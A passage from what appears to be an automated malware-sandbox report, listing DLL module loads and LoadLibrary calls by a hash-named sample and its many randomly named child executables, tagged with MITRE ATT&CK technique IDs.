\"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69f50000\n \"80824.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 704c0000\n \"80824.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"80824.exe\" loaded module \"KERNEL32\" at base 76a90000\n \"80824.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"80824.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69f50000\n \"80824.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74e20000\n \"466844.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 704c0000\n \"466844.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"466844.exe\" loaded module \"KERNEL32\" at base 76a90000\n \"466844.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"82466.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 704c0000\n \"82466.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"82466.exe\" loaded module \"KERNEL32\" at base 76a90000\n \"82466.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"82466.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69f50000\n \"82466.exe\" loaded module \"MSVCRT.DLL\" at base 75920000\n \"82466.exe\" loaded module \"SHLWAPI.DLL\" at base 753f0000\n \"82466.exe\" loaded module \"USER32.DLL\" at base 771f0000\n \"82466.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74e20000\n \"nhftnd.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 704c0000\n \"nhftnd.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"nhftnd.exe\" loaded module \"KERNEL32\" at base 76a90000\n \"nhftnd.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"nhftnd.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69f50000\n \"hthbft.exe\" loaded module \"MSVCRT.DLL\" at base 75920000\n \"hthbft.exe\" loaded module \"SHLWAPI.DLL\" at base 753f0000\n \"hthbft.exe\" loaded module \"USER32.DLL\" at base 771f0000\n \"hthbft.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74e20000\n \"hxtnlx.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 704c0000\n \"hxtnlx.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"hxtnlx.exe\" loaded module \"KERNEL32\" at base 76a90000\n \"hxtnlx.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"hxtnlx.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69f50000\n \"xpvvjv.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 704c0000\n \"xpvvjv.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"xpvvjv.exe\" loaded module \"KERNEL32\" at base 76a90000\n \"xpvvjv.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"xpvvjv.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69f50000\n \"pftnv.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 704c0000\n \"pftnv.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"pftnv.exe\" loaded module \"KERNEL32\" at base 76a90000\n \"pftnv.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"pftnv.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69f50000\n \"xjhvjn.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 704c0000\n \"xjhvjn.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"xjhvjn.exe\" loaded module \"KERNEL32\" at base 76a90000\n \"xjhvjn.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"xjhvjn.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69f50000\n \"nthpjvt.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 704c0000\n \"nthpjvt.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"nthpjvt.exe\" loaded module \"KERNEL32\" at base 76a90000\n \"nthpjvt.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"nthpjvt.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69f50000\n \"jdjdt.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 704c0000\n \"jdjdt.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"jdjdt.exe\" loaded module \"KERNEL32\" at base 76a90000\n \"jdjdt.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"jdjdt.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69f50000\n \"hxfhrx.exe\" loaded module \"MSVCRT.DLL\" at base 75920000\n \"hxfhrx.exe\" loaded module \"SHLWAPI.DLL\" at base 753f0000\n \"hxfhrx.exe\" loaded module \"USER32.DLL\" at base 771f0000\n \"hxfhrx.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74e20000\n \"00666.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 704c0000\n \"00666.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"00666.exe\" loaded module \"KERNEL32\" at base 76a90000\n \"00666.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"00666.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69f50000\n \"lvnptpp.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 704c0000\n \"lvnptpp.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"lvnptpp.exe\" loaded module \"KERNEL32\" at base 76a90000\n \"lvnptpp.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"lvnptpp.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69f50000\n \"vnbvdx.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 704c0000\n \"vnbvdx.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"vnbvdx.exe\" loaded module \"KERNEL32\" at base 76a90000\n \"vnbvdx.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"rdflttb.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 704c0000\n \"rdflttb.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"rdflttb.exe\" loaded module \"KERNEL32\" at base 76a90000\n \"rdflttb.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"rdflttb.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69f50000\n \"rdflttb.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74e20000\n \"rjffft.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 704c0000\n \"rjffft.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"rjffft.exe\" loaded module \"KERNEL32\" at base 76a90000\n \"rjffft.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"rjffft.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69f50000\n \"4066668.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 704c0000\n \"4066668.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"4066668.exe\" loaded module \"KERNEL32\" at base 76a90000\n \"4066668.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"4066668.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69f50000\n \"48628.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 704c0000\n \"48628.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"48628.exe\" loaded module \"KERNEL32\" at base 76a90000\n \"48628.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"dpdlf.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 704c0000\n \"dpdlf.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"dpdlf.exe\" loaded module \"KERNEL32\" at base 76a90000\n \"dpdlf.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"dpdlf.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69f50000\n \"dltbld.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 704c0000\n \"dltbld.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"dltbld.exe\" loaded module \"KERNEL32\" at base 76a90000\n \"dltbld.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"dltbld.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69f50000\n \"240286.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74e20000\n \"204084.exe\" loaded module \"MSVCRT.DLL\" at base 75920000\n \"204084.exe\" loaded module \"SHLWAPI.DLL\" at base 753f0000\n \"204084.exe\" loaded module \"USER32.DLL\" at base 771f0000\n \"204084.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74e20000\n \"24640.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 704c0000\n \"24640.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"24640.exe\" loaded module \"KERNEL32\" at base 76a90000\n \"24640.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"24640.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69f50000\n \"680284.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 704c0000\n \"680284.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"680284.exe\" loaded module \"KERNEL32\" at base 76a90000\n \"680284.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"680284.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69f50000\n \"66608.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74e20000\n \"jvvxj.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74e20000\n \"ptppdf.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 704c0000\n \"ptppdf.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"ptppdf.exe\" loaded module \"KERNEL32\" at base 76a90000\n \"ptppdf.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"ptppdf.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69f50000\n \"rhnlvvj.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 704c0000\n \"rhnlvvj.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"rhnlvvj.exe\" loaded module \"KERNEL32\" at base 76a90000\n \"rhnlvvj.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"rhnlvvj.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69f50000\n \"ltnlpd.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 704c0000\n \"ltnlpd.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"ltnlpd.exe\" loaded module \"KERNEL32\" at base 76a90000\n \"ltnlpd.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"ltnlpd.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69f50000\n \"fdtfnb.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74e20000\n \"tjphthx.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 704c0000\n \"tjphthx.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"tjphthx.exe\" loaded module \"KERNEL32\" at base 76a90000\n \"tjphthx.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"tjphthx.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69f50000\n \"rhpxblx.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 704c0000\n \"rhpxblx.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"rhpxblx.exe\" loaded module \"KERNEL32\" at base 76a90000\n \"rhpxblx.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"rhpxblx.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69f50000\n \"ftnpjx.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 704c0000\n \"ftnpjx.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"ftnpjx.exe\" loaded module \"KERNEL32\" at base 76a90000\n \"ftnpjx.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"ftnpjx.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69f50000\n \"ftnpjx.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74e20000\n \"rjlbb.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 704c0000\n \"rjlbb.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"rjlbb.exe\" loaded module \"KERNEL32\" at base 76a90000\n \"rjlbb.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"rjlbb.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69f50000\n \"vfdlx.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 704c0000\n \"vfdlx.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"vfdlx.exe\" loaded module \"KERNEL32\" at base 76a90000\n \"vfdlx.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"vfdlx.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69f50000\n \"xdnld.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74e20000\n \"tjbljn.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 704c0000\n \"tjbljn.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"tjbljn.exe\" loaded module \"KERNEL32\" at base 76a90000\n \"tjbljn.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"tjbljn.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69f50000\n \"tfftdr.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 704c0000\n \"tfftdr.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"tfftdr.exe\" loaded module \"KERNEL32\" at base 76a90000\n \"tfftdr.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"tfftdr.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69f50000\n \"8402600.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 704c0000\n \"8402600.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"8402600.exe\" loaded module \"KERNEL32\" at base 76a90000\n \"8402600.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"0642260.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 704c0000\n \"0642260.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"0642260.exe\" loaded module \"KERNEL32\" at base 76a90000\n \"0642260.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"0642260.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69f50000\n \"60024.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 704c0000\n \"60024.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"60024.exe\" loaded module \"KERNEL32\" at base 76a90000\n \"60024.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"60024.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69f50000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "details too long to display", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006116)\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006116)\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006116)\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006116)\n \"80824.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006128)\n \"80824.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006128)\n \"80824.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006128)\n \"80824.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006128)\n \"466844.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005872)\n \"466844.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005872)\n \"466844.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005872)\n \"466844.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005872)\n \"82466.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004108)\n \"82466.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004108)\n \"82466.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004108)\n \"82466.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004108)\n \"82466.exe\" called \"LoadLibrary\" with a parameter MSVCRT.dll (UID: 00000000-00004108)\n \"82466.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00004108)\n \"82466.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00004108)\n \"nhftnd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005988)\n \"nhftnd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005988)\n \"nhftnd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005988)\n \"nhftnd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005988)\n \"hthbft.exe\" called \"LoadLibrary\" with a parameter MSVCRT.dll (UID: 00000000-00004304)\n \"hthbft.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00004304)\n \"hthbft.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00004304)\n \"hxtnlx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006000)\n \"hxtnlx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006000)\n \"hxtnlx.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006000)\n \"hxtnlx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006000)\n \"xpvvjv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001208)\n \"xpvvjv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001208)\n \"xpvvjv.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001208)\n \"xpvvjv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001208)\n \"pftnv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004232)\n \"pftnv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004232)\n \"pftnv.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004232)\n \"pftnv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004232)\n \"xjhvjn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004184)\n \"xjhvjn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004184)\n \"xjhvjn.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004184)\n \"xjhvjn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004184)\n \"nthpjvt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004372)\n \"nthpjvt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004372)\n \"nthpjvt.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004372)\n \"nthpjvt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004372)\n \"jdjdt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004388)\n \"jdjdt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004388)\n \"jdjdt.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004388)\n \"jdjdt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004388)\n \"hxfhrx.exe\" called \"LoadLibrary\" with a parameter MSVCRT.dll (UID: 00000000-00002404)\n \"hxfhrx.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00002404)\n \"hxfhrx.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00002404)\n \"00666.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002912)\n \"00666.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002912)\n \"00666.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002912)\n \"00666.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002912)\n \"lvnptpp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000580)\n \"lvnptpp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000580)\n \"lvnptpp.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000580)\n \"lvnptpp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000580)\n \"vnbvdx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003712)\n \"vnbvdx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003712)\n \"vnbvdx.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003712)\n \"vnbvdx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003712)\n \"rdflttb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003212)\n \"rdflttb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003212)\n \"rdflttb.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003212)\n \"rdflttb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003212)\n \"rjffft.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003992)\n \"rjffft.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003992)\n \"rjffft.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003992)\n \"rjffft.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003992)\n \"4066668.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001896)\n \"4066668.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001896)\n \"4066668.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001896)\n \"4066668.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001896)\n \"48628.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002744)\n \"48628.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002744)\n \"48628.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002744)\n \"48628.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002744)\n \"dpdlf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001500)\n \"dpdlf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001500)\n \"dpdlf.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001500)\n \"dpdlf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001500)\n \"dltbld.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005808)\n \"dltbld.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005808)\n \"dltbld.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005808)\n \"dltbld.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005808)\n \"204084.exe\" called 